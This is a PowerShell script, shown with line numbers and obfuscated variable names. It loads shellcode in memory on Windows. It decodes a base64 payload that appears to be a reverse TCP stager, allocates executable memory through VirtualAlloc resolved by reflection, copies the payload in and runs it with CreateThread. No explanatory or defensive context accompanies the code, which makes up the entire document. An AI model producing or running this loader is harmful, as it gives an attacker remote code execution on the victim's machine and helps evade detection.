powershell

1. function j9bM {
2. Param ($jh5, $t5a)
3. $tzrt = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
4.  
5. return $tzrt.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($tzrt.GetMethod('GetModuleHandle')).Invoke($null, @($jh5)))), $t5a))
6. }
7.  
8. function n2v0 {
9. Param (
10. [Parameter(Position = 0, Mandatory = $True)] [Type[]] $qH,
11. [Parameter(Position = 1)] [Type] $u7wlf = [Void]
12. )
13.  
14. $af4P7 = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
15. $af4P7.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $qH).SetImplementationFlags('Runtime, Managed')
16. $af4P7.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $u7wlf, $qH).SetImplementationFlags('Runtime, Managed')
17.  
18. return $af4P7.CreateType()
19. }
20.  
21. [Byte[]]$gdr8A = [System.Convert]::FromBase64String("/EiD5PDozAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdBmgXgYCwIPhXIAAACLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpS////11JvndzMl8zMgAAQVZJieZIgeygAQAASYnlSbwCAABQClIGzkFUSYnkTInxQbpMdyYH/9VMiepoAQEAAFlBuimAawD/1WoKQV5QUE0xyU0xwEj/wEiJwkj/wEiJwUG66g/f4P/VSInHahBBWEyJ4kiJ+UG6maV0Yf/VhcB0Ckn/znXl6JMAAABIg+wQSIniTTHJagRBWEiJ+UG6AtnIX//Vg/gAflVIg8QgXon2akBBWWgAEAAAQVhIifJIMclBulikU+X/1UiJw0mJx00xyUmJ8EiJ2kiJ+UG6AtnIX//Vg/gAfShYQVdZaABAAABBWGoAWkG6Cy8PMP/VV1lBunVuTWH/1Un/zuk8////SAHDSCnGSIX2dbRB/+dYagBZu+AdKgpBidr/1Q==")
22.  
23. $id = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((j9bM kernel32.dll VirtualAlloc), (n2v0 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $gdr8A.Length,0x3000, 0x40)
24. [System.Runtime.InteropServices.Marshal]::Copy($gdr8A, 0, $id, $gdr8A.length)
25.  
26. $oQCuo = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((j9bM kernel32.dll CreateThread), (n2v0 @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$id,[IntPtr]::Zero,0,[IntPtr]::Zero)
27. [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((j9bM kernel32.dll WaitForSingleObject), (n2v0 @([IntPtr], [Int32]))).Invoke($oQCuo,0xffffffff) | Out-Null%